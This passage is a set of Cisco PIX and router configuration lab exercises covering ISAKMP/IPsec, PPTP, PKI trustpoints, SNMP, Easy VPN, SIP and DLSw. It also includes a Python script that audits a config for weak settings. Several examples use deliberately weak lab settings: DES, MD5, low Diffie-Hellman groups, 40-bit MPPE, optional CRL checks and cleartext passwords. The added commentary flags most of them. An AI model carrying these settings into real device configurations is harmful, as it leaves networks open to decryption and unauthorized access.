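The first three packets are permitted and the remaining three fall through to the implicit deny. The NAT-T case is the one that catches people in practice: if the peer sits behind a NAT device, IKE and ESP move to UDP 4500 and this access-list would block the tunnel until a matching udp entry is added.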

Cisco PIX Challenge 22

Outline
This challenge involves the configuration of ISAKMP.
Objectives
The objectives of this challenge are to:

Define ISAKMP.
Define ISAKMP policy.
Enable ISAKMP on an interface.

Example
pixfirewall(config)# isakmp
Usage: isakmp policy <priority> authen <pre-share|rsa-sig>
       isakmp policy <priority> encrypt <aes|aes-192|aes-256|des|3des>
       isakmp policy <priority> hash <md5|sha>
       isakmp policy <priority> group <1|2|5>
       isakmp policy <priority> lifetime <seconds>
       isakmp key <key-string> address <ip> [netmask <mask>] [no-xauth] [noconfig-mode]
       isakmp enable <if_name>
       isakmp identity <address|hostname|key-id> [<key-id-string>]
       isakmp keepalive <seconds> [<retry seconds>]
       isakmp nat-traversal [<natkeepalive>]
       isakmp client configuration address-pool local <poolname> [<pif_name>]
       isakmp peer fqdn|ip <fqdn|ip> [no-xauth] [no-config-mode]
pixfirewall(config)# help isakmp
USAGE:
isakmp am-disable
isakmp ipsec-over-tcp [port <port1>..<port10>]
isakmp disconnect-notify
(DEPRECATED) isakmp key <keystring> address <peer-address> [netmask <mask>]
             [no-xauth] [no-config-mode]
isakmp enable <if_name>
isakmp identity {auto|address|hostname|key_id <key_id_str>}
(DEPRECATED) isakmp keepalive <threshold> [<retry-interval>]
isakmp nat-traversal [<natkeepalive>]
(DEPRECATED) isakmp client configuration address-pool local <pool-name>
             [<if_name>]
(DEPRECATED) isakmp peer fqdn | ip <fqdn | ip> {no-xauth | no-mode-cfg}
isakmp policy <priority> authen {<pre-share|rsa-sig|dsa-sig>}
isakmp policy <priority> encrypt {<des|3des|aes|aes-192|aes-256>}
isakmp policy <priority> group {<1|2|5|7>}
isakmp policy <priority> hash {<md5|sha>}
isakmp policy <priority> lifetime <seconds>
isakmp reload-wait
DESCRIPTION:
isakmp             Configure ISAKMP key, peer, policy and other options
SYNTAX:
am-disable         Disable inbound aggressive mode connections
ipsec-over-tcp     Enable and configure IPSec over TCP
port               Set IPSec over TCP ports
<port1..port10>    Specify up to 10 IPSec over TCP ports
disconnect-notify  Enable disconnect notification to peers
key                Configure a pre-shared key associated with a peer
                   This command is deprecated. Refer to
                   'tunnel-group ipsec-attributes' instead
<keystring>        String (ASCII) to be used for authentication pre-share
<peer-address>     IP address of peer associated with pre-shared key
<mask>             Netmask specified in dotted-decimal notation
no-xauth           Specifies an xauth policy exception
no-mode-config     Specifies a config mode policy exception
enable             Enable ISAKMP on specified interface
<if_name>          Interface name on which to enable ISAKMP
identity           Set identity type (address,hostname or key-id)
<address>          Use IP address of the interface for the identity
<auto>             Identity auto(IP address for preshared key and
                   Cert DN for Cert based connections)
<hostname>         Use hostname of the device for the identity
<key-id>           Use specified key-id string for the identity
<key-id-str>       The string to be used as key-id
keepalive          Set keepalive interval. This command is deprecated.
                   Refer to 'tunnel-group ipsec-attributes' instead
<threshold>        Time, in seconds, peer can remain idle before
                   keep-alive monitoring commences
<retry-interval>   Time, in seconds, between keep-alive messages
nat-traversal      Enable and configure nat traversal
<natkeepalive>     Set nat traversal keepalive interval
<priority>         Policy suite priority (1 highest, 65535 lowest)
authentication     Authentication method (pre-share,rsa-sig or dsa-sig)
encryption         Encryption algorithm (des,3des,aes,aes-192 or aes256)
hash               Hash algorithm (md5 or sha)
group              Diffie-Hellman group (1,2,5 or 7)
lifetime           ISAKMP SA lifetime (seconds)
client configuration address-pool local
                   Configure client IP address pool attribute
                   This command is deprecated. Refer to 'ip local-pool',
                   'tunnel-group general-attributes address-pool' instead
<pool-name>        Name of ip local pool to allocate dynamic client ip
<if_name>          Interface name the ip local pool is associated with
                   Defaults to 'outside' if not specified
peer               Identify a peer security gateway to exempt from Xauth
                   and/or Mode Configuration. This command is deprecated.
                   Refer to 'isakmp identity' instead
<fqdn | ip>        Fully qualified domain name or IP address of a remote
                   peer to be exempted from xauth or config mode policy
reload-wait        Wait for voluntary termination of sessions before reboot
see also:          ca, dynamic-map, ipsec, map
(config)# isakmp enable outside
(config)# isakmp key ABC&FDD address 176.16.0.2 netmask 255.255.255.255
(config)# isakmp identity address
(config)# isakmp policy 5 authen pre-share
(config)# isakmp policy 5 encrypt des
(config)# isakmp policy 5 hash sha
(config)# isakmp policy 5 group 1
(config)# isakmp policy 5 lifetime 86400

(config)# show isakmp

Cisco PIX Challenge 23

Outline
This challenge involves the configuration of crypto details.
Objectives
The objectives of this challenge are to:

Enable IPSEC.
Define a crypto map.
Apply a crypto map.

Example
(config)# help sysopt
USAGE:
[no] sysopt connection { permit-ipsec |
                         timewait | {tcpmss [minimum] <bytes>}
[no] sysopt noproxyarp <if-name>
[no] sysopt nodnsalias { inbound | outbound }
[no] sysopt radius ignore-secret
[no] sysopt uauth allow-http-cache
show running-config [all] sysopt
clear configure sysopt
DESCRIPTION:
sysopt                    Set system functional option
SYNTAX:
connection permit-ipsec   - Exempt IPSec traffic from access check.
connection timewait       - TCP conn undergoes TIMEWAIT state.
connection tcpmss         - Set maximum limit of TCP MSS to <bytes>.
connection tcpmss minimum - Set minimum limit of TCP MSS to <bytes>.
noproxyarp <if-name>      - Disable proxy arp on interface <if-name>.
nodnsalias inbound        - Disable alias inbound DNS A record translation.
nodnsalias outbound       - Disable alias outbound DNS A record translation.
radius ignore-secret      - Ignore secret in RADIUS accounting responses.
uauth allow-http-cache    - Allow browser to use cached user credentials.
see also: alias, ca, ipsec, isakmp, map, dynamic-map
(config)# sysopt connection permit-ipsec
(config)# help cry
USAGE:
crypto { ca | dynamic-map | ipsec | isakmp | key | map }
For more detailed help, please refer directly to the subcommands
DESCRIPTION:
crypto        Configure IPsec, IKE, Certificate Authority and Long Term
              Key Operations
SYNTAX:
ca            Configure the Certification Authority
              See "crypto ca ?" or "help ca"
dynamic-map   IPSec crypto dynamic-map policy
              See "crypto dynamic-map ?" or "dynamic-map ?" or
              "help dynamic-map"
ipsec         Configure transform-set and IPSec SA lifetime
              See "crypto ipsec ?" or "ipsec ?" or "help ipsec"
isakmp        IKE policy and configuration
              See "crypto isakmp ?" or "isakmp ?" or "help isakmp"
key           Long term key operations
              See "crypto key ?" or "help key"
map           IPSec crypto map policy
              See "crypto map ?" or "map ?" or "help map"
(config)# crypto ipsec transform-set MYIPSECFORMAT esp-des esp-sha-hmac
(config)# crypto map MYIPSEC 10 ipsec-isakmp
(config)# access-list 111 permit ip 10.0.0.0 255.255.255.0 176.16.0.0 255.255.255.0
(config)# crypto map MYIPSEC 10 match address 111
(config)# crypto map MYIPSEC 10 set peer 176.16.0.2
(config)# crypto map MYIPSEC 10 set transform-set MYIPSECFORMAT
(config)# crypto map MYIPSEC interface outside

Cisco PIX Challenge 24

Outline
This challenge involves the configuration of VPDN.
Objectives
The objectives of this challenge are to:

Enable PPTP.
Define local pool.
Create VPDN group.
Enable VPDN on an interface.

Example
(config)# sysopt connection permit-pptp
(config)# help ip
USAGE:
ip local pool <poolname> <ip1>[-<ip2>] [mask <netmask>]
ip verify reverse-path interface <if_name>
ip audit {info|attack} action [alarm] [drop] [reset]
ip audit name <audit_name> {info|attack} [action [alarm] [drop] [reset]]
ip audit interface <if_name> <audit_name>
ip audit signature <sig_number> disable
show|clear ip audit count [global] [interface <interface>]
clear configure ip audit [configuration]
DESCRIPTION:
ip               Define a local address pool
                 Configure Unicast RPF on an interface
                 Configure the Intrusion Detection System
SYNTAX:
<poolname>       name of the local address pool
<ip1>-[<ip2>]    address range of the local address pool
<netmask>        network mask of the local address pool
<if_name>        The name designated for the interface by the nameif command
info             IDS informational signatures.
attack           IDS attack signatures.
alarm            When a signature match is detected, report the event
                 to syslog servers.
drop             When a signature match is detected, drop the offending
                 packet.
reset            When a signature match is detected, drop the offending
                 packet and close the connection if it is part of an
                 active connection.
<audit_name>     Audit policy name.
<sig_number>     IDS signature number.
see also:        interface, ip address (interface sub-mode command),
                 show interface, isakmp
(config)# ip local pool pptp-pool 10.0.0.1-10.0.0.100
(config)# help vpd
USAGE:
vpdn group <name>
     accept dialin l2tp
     ppp authentication pap|chap|mschap|eap
     This command has been deprecated. New syntax:
     tunnel-group <name> ppp-attributes
     authentication pap
     authentication chap
     authentication mschap
     authentication eap |
     client configuration address local <address_pool_name> |
     client configuration dns <dns_ip1> [<dns_ip2>]|
     client configuration wins <wins_ip1> [<wins_ip2>]|
     client authentication local|aaa <auth_aaa_group>|
     client accounting <acct_aaa_group>|
     l2tp tunnel hello <hello_time>
show vpdn tunnel [l2tp|pppoe] [id <tnl_id>|packets|state|summary|transport]
show vpdn session [l2tp|pppoe] [id <sess_id>|packets|state|window]
show vpdn pppinterface [id <dev_id>]
show vpdn group [<group_name>]
show vpdn username [user_name]
clear vpdn [group|interface|tunnel|username]
DESCRIPTION:
vpdn                 Configure VPDN (L2TP, PPPoE) Policy
SYNTAX:
<address_pool_name>  local address pool name
<dns_ip>             DNS server ip address
<wins_ip>            WINS server ip address
<auth_aaa_group>     Authentication AAA server group name
<acct_aaa_group>     Accounting AAA server group name
<hello_time>         l2tp tunnel keep-alive hello timeout value (seconds)
<if_name>            Interface to accept L2TP request
<name>               user name
<passwd>             user password
<tnl_id>             tunnel id
<sess_id>            session id
<store-local>        Store in local flash instead of using external config
see also:            crypto, aaa-server, ip local pool
(config)# vpdn group 1 accept dialin pptp
(config)# vpdn group 1 ppp authentication mschap
(config)# vpdn group 1 ppp encryption mppe 40
(config)# vpdn group 1 client configuration address local pptp-pool
(config)# vpdn group 1 client configuration dns 172.64.10.1
(config)# vpdn group 1 client authentication local
(config)# vpdn enable outside

Cisco Router Challenge 194


Outline
This challenge involves the configuration of a digital certificate server.
Objectives
The objectives of this challenge are to:

Enable domain name.


Generate RSA keys.
Define trustpoints.

Example
# config t
(config)# hostname test
test(config)# ip host FRED 1.2.3.4
test(config)# ip domain-name test.com
test(config)# crypto ?
ca
Certification authority
dynamic-map Specify a dynamic crypto map template


identity
Enter a crypto identity list
ipsec
Configure IPSEC policy
isakmp
Configure ISAKMP policy
key
Long term key operations
keyring
Key ring commands
map
Enter a crypto map
mib
Configure Crypto-related MIB Parameters
pki
Public Key components
wui
Crypto HTTP configuration interfaces
xauth
X-Auth parameters
test(config)# crypto ca ?
authenticate Get the CA certificate
certificate
Actions on certificates
crl
Actions on certificate revocation lists
enroll
Request a certificate from a CA
export
Export certificate or PKCS12 file
import
Import certificate or PKCS12 file
profile
Define a certificate profile
trustpoint
Define a CA trustpoint
test(config)# cry ca t ?
WORD CA Server Name
test(config)# cry ca t ANY ?
<cr>
test (config)# crypto ca trustpoint testing
test(ca-trustpoint)# ?
CA Trust Point configuration commands:
authorization
Authorization parameters.
auto-enroll
Automatically enroll this router identity
crl
CRL options
default
Set a command to its defaults
enrollment
Enrollment parameters
exit
Exit from certificate authority trustpoint entry mode
fqdn
include fully-qualified domain name
ip-address
include ip address
match
Match a certificate map
no
Negate a command or set its defaults
ocsp
OCSP parameters
password
revocation password
primary
Specify trustpoint as primary
query
Query parameters
regenerate
Regenerate keys on re-enrollment
revocation-check Revocation checking options
root
Protocol to get CA certificate
rsakeypair
Specify rsakeypair for this identity
serial-number
include serial number
show
Show this router trustpoint
source
Specify source
subject-name
Subject Name
usage
Certificate Usage
vrf
vrf to use for enrollment and obtaining CRLs
test(ca-trustpoint)# enrollment ?
http-proxy HTTP proxy server for enrollment
mode
Mode supported by the Certificate Authority
profile
Specify an profile for enrollment
retry
Polling parameters
terminal
Enroll via the terminal (cut-and-paste)
url
CA server enrollment URL
test(ca-trustpoint)# enrollment url ?
WORD
HTTP URL
flash:
Enroll via flash: file system
ftp:
Enroll via ftp: file system
http:
Enroll via http: file system


https:
Enroll via https: file system
null:
Enroll via null: file system
nvram:
Enroll via nvram: file system
pem
Include PEM encapsulation boundaries
rcp:
Enroll via rcp: file system
scp:
Enroll via scp: file system
system: Enroll via system: file system
tftp:
Enroll via tftp: file system
<cr>
test(ca-trustpoint)# enrollment url http://testing/1.dll
test(ca-trustpoint)# crl ?
optional  Optional crl
query     Query crl
test(ca-trustpoint)# crl optional
test(ca-trustpoint)# exit

Note that crl optional tells the router to accept a peer certificate even when it cannot obtain a CRL, so a revoked certificate is still trusted whenever the CRL distribution point is unreachable. Newer IOS releases replace this keyword with revocation-check crl none; outside a lab, require a check (revocation-check crl, or ocsp with a reachable responder) rather than making it optional.
test(config)# crypto ca authenticate ?
WORD CA Server Name
test(config)# crypto ca authenticate testing
test(config)# crypto ca enroll ?
WORD CA Server Name
<cr>
test(config)# crypto ca enroll testing

Both commands take the trustpoint name defined above (testing): authenticate fetches and displays the CA certificate, whose fingerprint should be compared against one obtained out of band before it is accepted, and enroll then requests the router's own certificate from that CA.

Cisco Router Challenge 193


Outline
This challenge involves the configuration of SNMP settings
Objectives
The objectives of this challenge are to:

Define SNMP parameters.

Example
# config t
(config)# snmp-server ?
chassis-id
String to uniquely identify this chassis
community
Enable SNMP; set community string and access privs
contact
Text for mib object sysContact
context
Create/Delete a context apart from default
drop
Silently drop SNMP packets
enable
Enable SNMP Traps or Informs
engineID
Configure a local or remote SNMPv3 engineID
group
Define a User Security Model group


host
Specify hosts to receive SNMP notifications
ifindex
Enable ifindex persistence
location
Text for mib object sysLocation
packetsize
Largest SNMP packet size
queue-length
Message queue length for each TRAP host
system-shutdown
Enable use of the SNMP reload command
tftp-server-list Limit TFTP servers used via SNMP
trap
SNMP trap options
trap-source
Assign an interface for the source address of all traps
trap-timeout
Set timeout for TRAP message retransmissions
user
Define a user who can access the SNMP engine
view
Define an SNMPv2 MIB view
(config)# snmp-server community popup ro
(config)# snmp-server contact june
(config)# snmp-server location glasgow
(config)# snmp-server enable ?
informs Enable SNMP Informs
traps
Enable SNMP Traps
(config)# snmp-server enable traps
(config)# snmp-server chassis-id brighton
(config)# access-list 10 permit 10.0.0.0 0.0.0.255
(config)# access-list 10 deny any
(config)# snmp-server com popup ?
<1-99>
Std IP accesslist allowing access with this community string
<1300-1999> Expanded IP accesslist allowing access with this community
string
WORD
Access-list name
ro
Read-only access with this community string
rw
Read-write access with this community string
view
Restrict this community to a named MIB view
<cr>
(config)# snmp-server community popup ro ?
<1-99>
Std IP accesslist allowing access with this community string
<1300-1999> Expanded IP accesslist allowing access with this community
string
WORD
Access-list name
<cr>
(config)# snmp-server community popup ro 10

This limits SNMP access with the community string popup to hosts in 10.0.0.0/24 (the sources permitted by access-list 10); requests from any other address are dropped. The community string itself still travels in cleartext with SNMPv1/v2c, so where the management station supports it, prefer SNMPv3 (snmp-server group and snmp-server user with authentication and privacy) over a community string.

Cisco Router Challenge 194


Outline
This challenge involves setting up the Easy VPN server on the IOS Firewall. In this
challenge the details for the Cisco VPN Client will be defined.
Objectives
The objectives of this challenge are to:


Define AAA details.


Define Cisco VPN group details.
Define VPN details.

Example
# config t
(config)# aaa new-model
(config)# aaa authentication login DEFAULT1 ?
enable
Use enable password for authentication.
group
Use Server-group
krb5
Use Kerberos 5 authentication.
krb5-telnet Allow logins only if already authenticated via Kerberos V
Telnet.
line
Use line password for authentication.
local
Use local username authentication.
local-case
Use case-sensitive local username authentication.
none
NO authentication.
(config)# aaa authentication login DEFAULT1 local
(config)# aaa authorization network DEFAULT2 ?
group
Use server-group.
if-authenticated Succeed if user has authenticated.
local
Use local database.
none
No authorization (always succeeds).
(config)# aaa authorization network DEFAULT2 local
(config)# username fred password bert
(config)# ip local pool POOL1 10.0.0.1 10.0.0.254
(config)# crypto isakmp policy 5
(config-isakmp)# encryption des
(config-isakmp)# hash md5
(config-isakmp)# authentication pre-share
(config-isakmp)# group 2
(config-isakmp)# exit

This policy (DES, MD5, Diffie-Hellman group 2) is what the example uses, but none of these choices are acceptable on a production device: use AES, a SHA-2 hash and DH group 14 or stronger, and pair the policy with a matching transform-set rather than esp-des.

The following details will be used by users for their VPN connection:
(config)# crypto isakmp client configuration group MYCONNECTION
(config-isakmp-group)# ?
ISAKMP group policy config commands:
access-restrict
Restrict clients in this group to an interface
acl
Specify split tunneling inclusion access-list number
backup-gateway
Specify backup gateway
dns
Specify DNS Addresses
domain
Set default domain name to send to client
firewall
Enforce group firewall feature
group-lock
Enforce group lock feature
include-local-lan Enable Local LAN Access with no split tunnel
key
pre-shared key/IKE password
max-logins
Set maximum simultaneous logins for users in this group
max-users
Set maximum number of users for this group
netmask
netmask used by the client for local connectivity
no
Negate a command or set its defaults
pfs
The client should propose PFS
pool
Set name of address pool
save-password
Allows remote client to save XAUTH password
split-dns
DNS name to append for resolution


wins
Specify WINS Addresses
<cr>
(config-isakmp-group)# domain ?
WORD default domain name
(config-isakmp-group)# domain test.com
(config-isakmp-group)# key ?
0
Specifies an UNENCRYPTED password will follow
6
Specifies an ENCRYPTED password will follow
WORD The UNENCRYPTED (cleartext) user password
(config-isakmp-group)# key testing
(config-isakmp-group)# pool ?
WORD address pool name
(config-isakmp-group)# pool POOL1
(config-isakmp-group)# exit

On the VPN client the following details would be defined:


Group name: MYCONNECTION
Group password: testing

The user, if successful, will then be allocated an address from the IP pool (POOL1).
Now we must define the IPSec transform to be used:
(config)# crypto ipsec transform-set MYSET esp-des
(cfg-crypto-trans)# ?
Crypto transform configuration commands:
default Set a command to its defaults
exit
Exit from crypto transform configuration mode
mode
encapsulation mode (transport/tunnel)
no
Negate a command or set its defaults
(cfg-crypto-trans)# exit


To define the authorization and authentication for local users:


(config)# crypto map MYMAP client authentication list DEFAULT1
(config)# crypto map MYMAP isakmp authorization list DEFAULT2
(config)# crypto map MYMAP 10
(config-config-map)# set transform-set MYSET
(config-config-map)# exit
(config)# int e0
(config-if)# crypto map MYMAP
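The SNMP community in the previous challenge and the ISAKMP policy in this one are the two places in these challenges where a weak setting is easy to leave behind. The following Python script is an added example, not part of the NetworkSims page or of any Cisco tool: it reads a running-config (here a constructed sample that embeds the commands from the SNMP and Easy VPN challenges plus a deliberately weak community, username, transform-set and a second, stronger ISAKMP policy for contrast; the admin username and its hash value are made up) and flags the settings a reviewer would reject. The audit rules, the sample config and the function names are this example's own assumptions.

```python
import re

# Constructed sample running-config: the SNMP and Easy VPN commands from the
# challenges above, plus one weaker variant of each (an unrestricted read-write
# community, a 'password' username, the esp-des transform-set) and a second
# ISAKMP policy so that the audit has something to contrast. The 'admin' user
# and its hash are invented.
SAMPLE_CONFIG = """\
aaa new-model
aaa authentication login DEFAULT1 local
aaa authorization network DEFAULT2 local
username fred password bert
username admin secret 5 $1$abcd$constructedhashvalue
ip local pool POOL1 10.0.0.1 10.0.0.254
access-list 10 permit 10.0.0.0 0.0.0.255
access-list 10 deny any
snmp-server community popup ro 10
snmp-server community public rw
crypto isakmp policy 5
 encryption des
 hash md5
 authentication pre-share
 group 2
crypto isakmp policy 10
 encryption aes 256
 hash sha256
 authentication pre-share
 group 14
crypto ipsec transform-set MYSET esp-des
"""

WEAK_ENCRYPTION = {"des", "3des"}
WEAK_HASH = {"md5"}
WEAK_DH_GROUPS = {"1", "2", "5"}
DEFAULT_COMMUNITIES = {"public", "private"}


def parse_isakmp_policies(config):
    """Return {priority: {"encryption", "hash", "group"}} for every
    'crypto isakmp policy' block, filling in the IOS defaults (des, sha,
    group 1) for any parameter the block does not set explicitly."""
    policies = {}
    current = None
    for line in config.splitlines():
        m = re.match(r"crypto isakmp policy (\d+)$", line)
        if m:
            current = {"encryption": "des", "hash": "sha", "group": "1"}
            policies[m.group(1)] = current
        elif current is not None and line.startswith(" "):
            parts = line.split()
            if len(parts) >= 2 and parts[0] in current:
                current[parts[0]] = parts[1]
        else:
            current = None          # any other top-level line ends the block
    return policies


def parse_snmp_community(line):
    """Split 'snmp-server community NAME [view V] [ro|rw] [ACL]' into
    (name, mode, acl); acl is None when the community is unrestricted."""
    parts = line.split()
    name, tail = parts[2], parts[3:]
    if "view" in tail:                      # drop the optional 'view NAME'
        i = tail.index("view")
        del tail[i:i + 2]
    mode = "rw" if "rw" in tail else "ro"   # IOS defaults to read-only
    acls = [t for t in tail if t not in ("ro", "rw")]
    return name, mode, (acls[0] if acls else None)


def audit_config(config):
    """Return a list of findings (short strings) for the weak settings a
    reviewer would flag in the commands shown in these challenges."""
    findings = []
    for line in config.splitlines():
        if line.startswith("snmp-server community "):
            name, mode, acl = parse_snmp_community(line)
            if name in DEFAULT_COMMUNITIES:
                findings.append(f"snmp community '{name}': default community string")
            if mode == "rw":
                findings.append(f"snmp community '{name}': read-write access")
            if acl is None:
                findings.append(f"snmp community '{name}': no access-list restricts callers")
        elif re.match(r"username \S+ password ", line):
            user = line.split()[1]
            findings.append(f"username '{user}': reversible 'password', use 'secret' instead")
        elif line.startswith("crypto ipsec transform-set ") and " esp-des" in line:
            findings.append(f"transform-set {line.split()[3]}: esp-des is weak")
    for prio, p in parse_isakmp_policies(config).items():
        if p["encryption"] in WEAK_ENCRYPTION:
            findings.append(f"isakmp policy {prio}: encryption {p['encryption']} is weak")
        if p["hash"] in WEAK_HASH:
            findings.append(f"isakmp policy {prio}: hash {p['hash']} is weak")
        if p["group"] in WEAK_DH_GROUPS:
            findings.append(f"isakmp policy {prio}: DH group {p['group']} is weak")
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

Run against the sample, the script reports the 'public rw' community three times (default string, read-write, no access-list), the plaintext username, the esp-des transform-set and all three parameters of policy 5, while the ACL-restricted popup community and policy 10 pass. Feed it the output of show running-config from a real device to audit a configuration the same way.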


21 Router Additional
Cisco Router Challenge 195
Outline
This challenge involves the configuration of SIP with a Cisco SIP Gateway FXO setup. Some
routers have Foreign Exchange Station (FXS) interfaces which can connect to a standard
telephone, fax machine, or similar device and thus must provide ringing, voltage supplies,
and a dial tone. Normally the FXS interface uses an RJ-11 connector to connect to telephone
equipment.
Objectives
The objectives of this challenge are to:

Define SIP details.


Define the voice port settings

Outline
> enable
# sh version
# config t
(config)# sip-ua
(config-sip-ua)# ?
(config-sip-ua)# exit
(config)# voice-port ?
(config)# voice-port 1/0/0
(config-voiceport)# ?
(config-voiceport)# description ?
(config-voiceport)# description testing
(config-voiceport)# input ?
(config-voiceport)# input gain ?
(config-voiceport)# input gain 8
(config-voiceport)# caller-id ?
(config-voiceport)# caller-id enable
(config-voiceport)# exit
(config)# dial-peer ?
(config)# dial-peer voice ?
(config)# dial-peer voice 200 ?
(config)# dial-peer voice 200 voip
(config-dial-peer)# ?
(config-dial-peer)# exit
(config)# gateway
(config-gateway)# ?


Example
> enable
# sh version
Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 11:18 by prod_rel_team
ROM: System Bootstrap, Version 12.2(7r) [cmong 7r], RELEASE SOFTWARE (fc1)
Router uptime is 5 hours, 38 minutes
System returned to ROM by power-on
System image file is "flash:c2600-testk9-mz.124-12.bin"
Cisco 2611XM (MPC860P) processor (revision 1.0) with 111616K/19456K bytes of memory.
Processor board ID JAD07130QPE
M860 processor: part number 5, mask 2
2 FastEthernet interfaces
2 Serial(sync/async) interfaces
2 Voice FXO interfaces
2 Voice FXS interfaces
32K bytes of NVRAM.
49152K bytes of processor board System flash (Read/Write)
Configuration register is 0x3162
# config t
(config)# sip-ua
(config-sip-ua)# ?
SIP UA configuration commands:
aaa
sip-ua AAA related configuration
authentication
Digest Authentication Configuration
calling-info
Specify treatment of calling information
default
Set a command to its defaults
disable-early-media Disable early-media cut through
exit
Exit from sip-ua configuration mode
max-forwards
Change number of max-forwards for SIP Methods
mwi-server
Configure a mwi Server
nat
Enable NAT(Network Address Traversal) settings for the
SIP User Agent
no
Negate a command or set its defaults
notify
SIP Signaling Notify Configuration
offer
Configure settings for Offers made from the Gateway
reason-header
Configure settings for supporting SIP Reason Header
redirection
Enable call redirection (3xx) handling
registrar
Configure SIP registrar VoIP Interface
remote-party-id
Enable Remote-Party-ID support in SIP User Agent
retry
Change default retries for each SIP Method
set
Sets the PSTN cause to SIP status code (and vice versa)
and sets the PSTN cause to SIP requests
sip-server
Configure a SIP Server Interface
srv
DNS SRV Query Type
suspend-resume
Enable support for ISDN SUSPEND/RESUME
timers
SIP Signaling Timers Configuration
transport
Enable SIP UA transport for TCP/UDP
(config-sip-ua)# exit
(config)# voice-port ?
<1-1> Voice interface slot
(config)# voice-port 1/0/0
(config-voiceport)# ?
Voice-port configuration commands:
battery-reversal
Enable FXS battery-reversal generation
bearer-cap
Specify the bear capability
busyout
Configure busyout trigger event & procedure
caller-id
Configure port caller id parameters
comfort-noise
Use fill-silence option
connection
Specify Trunking Parameters
cptone
Configure voice call progress tone locale
default
Set a command to its defaults
description
Description of what this port is connected to
disc_pi_off
close voice path when disconnect with PI received
disconnect-ack
FXS sending disconnect acknowledge
echo-cancel
Echo-cancellation option
exit
Exit from voice-port configuration mode
impedance
Specifies the terminating impedance of the interface
input
Configure input gain for voice
music-threshold
Threshold for Music on Hold
mwi
Enable MWI on this port
no
Negate a command or set its defaults
non-linear
Use non-linear processing during echo cancellation
output
Configure output attenuation for voice
playout-delay
Configure voice playout delay buffer
ren
Ringer Equivalence Number
ring
Ring frequency Parameters
shutdown
Take voice-port offline
signal
The signaling type for the interface FXS or FXO
snmp
Modify SNMP voice port parameters
station-id
Configure station ID
supervisory
Configure supervisory disconnect lcfo
threshold
Threshold [noise] for voice port
timeouts
Configure voice timeout parameters
timing
Configure voice timing parameters
translate
Translation rule
translation-profile Translation profile
trunk-group
Configure interface to be in a trunk group
voice-class
Set voiceport voice class control parameters
(config-voiceport)# description ?
LINE A string (up to 64 characters) describing the port connection (e.g.
pbx1)
(config-voiceport)# description testing
(config-voiceport)# input ?
gain Configure gain in db for voice input
(config-voiceport)# input gain ?
<-6 - 14> gain in db
(config-voiceport)# input gain 8
(config-voiceport)# caller-id ?
alerting
Define caller id alerting method
attenuation Configure caller id tx attenuation
block
Block the caller id of the calls made from this port
enable
Enable caller id on this port
format
Change caller id format
(config-voiceport)# caller-id enable
(config-voiceport)# exit
(config)# dial-peer ?
cor
Class of Restriction
hunt
Define the dial peer hunting choice
outbound
Define the outbound options
terminator Define the address terminate character
voice
Voice type


(config)# dial-peer voice ?


<1-2147483647> Voice dial-peer tag
(config)# dial-peer voice 200 ?
mmoip Multi Media Over IP
pots
Telephony
voatm Voice over ATM
vofr
Voice over Frame Relay
voip
Voice over IP
(config)# dial-peer voice 200 voip
(config-dial-peer)# ?
DIALPEER configuration commands:
acc-qos
The Minimally Acceptable Quality of Service to be
used in getting to this peer
answer-address
The Call Destination Number
application
The selected application
call
Per Voip dial-peer Call configuration
call-block
Incoming Call Blocking
carrier-id
Configure Carrier ID
clid
Caller ID option
codec
The codec rate to be attempted in getting to this peer
corlist
set the Class of Restriction lists
default
Set a command to its defaults
description
Dialpeer specific description
destination-pattern
A full E.164 telephone number prefix
dnis-map
The name of a configured dnis-map
dtmf-relay
Transport DTMF digits across IP link
exit
Exit from dial-peer configuration mode
expect-factor
Expectation Factor of voice quality
fax
Configure fax
fax-relay
fax-relay options
huntstop
Stop hunting on Dial-Peers
icpif
Calculated Planning Impairment Factor
incoming
Incoming called number
ip
Set ip packet options
max-conn
Sets the maximum connections per peer, negation sets
to unlimited
max-redirects
Configure the max number of redirects for this
dialpeer
modem
Modem commands through this peer
no
Negate a command or set its defaults
numbering-type
The calling/called party numbering type
permission
set the call orig/term permission of this dialpeer
playout-delay
Configure voice playout delay buffer
preference
Configure the preference order of this dialpeer
req-qos
The desired Quality of Service to be used in
getting to this peer
roaming
Use roaming server
rtp
RTP config
session
The session [ target | protocol | transport ] for this
peer
settle-call
Use settlement server
shutdown
Change the Admin State of this peer to down (no->up)
signal-type
The signaling type to be used when getting to this
peer
signaling
Signaling payload handling
snmp
Modify SNMP voice peer parameters
supplementary-service Config supplementary service features
tech-prefix
The H.323 gateway technology prefix
tone
Generate tones

translate-outgoing     Translation rule
translation-profile    Translation profile
trunk-group-label      Configure Trunk Group Label
trunkgroup             trunk groups associated with this peer
vad                    Use VoiceActivityDetection as necessary option
voice                  Configure GATEWAY dial-peer for voice services
voice-class            Set Dial-peer voice class control parameters
(config-dial-peer)# exit
(config)# gateway

(config-gateway)# ?
GATEWAY configuration commands:
default
Set a command to its defaults
emulate
Gateway emulation configuration
exit
Exit from gateway configuration mode
no
Negate a command or set its defaults
security Gateway security configuration
timer
Gateway-wide timers

Cisco Router Challenge 196


Outline
This challenge involves the configuration of DLSw (Data-Link Switching), which allows the
tunneling of Systems Network Architecture (SNA) and NetBIOS traffic within an IP
network. It uses a switch-to-switch protocol, and the routers are named data link switches.
Objectives
The objectives of this challenge are to:

Define a local loopback address.


Define DLSw details.

Outline
> enable
# config t
(config)# int loopback 0
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# exit
(config)# dlsw local-peer peer-id 10.0.0.1
(config)# dlsw remote 0 tcp 11.0.0.1
(config)# dlsw bridge 1
(config)# dlsw udp-disable
(config)# int fa0
(config-if)# bridge-group 1
(config-if)# exit
(config)# bridge 1 protocol ieee

Example
In the following case the local address is 10.0.0.1, and the remote address is 11.0.0.1.


> enable
# config t
(config)# int loopback 0
(config-if)# ip address 10.0.0.1 255.255.255.0
(config-if)# exit
(config)# dlsw ?
allroute-netbios               Use All routes Broadcast for NETBIOS Explorers
allroute-sna                   Use All routes Broadcast for SNA Explorers
bgroup-list                    Configure a transparent bridge group list
bridge-group                   DLSw interconnection to transparent bridging
cache-ignore-netbios-datagram  Don't cache source mac/name of NetBIOS datagrams
circuit-keepalives             Configure DLSw+ to generate periodic circuit keepalives
disable                        Disable DLSw without altering the configuration
explorerQ-depth                Configure depth of DLSw control queues
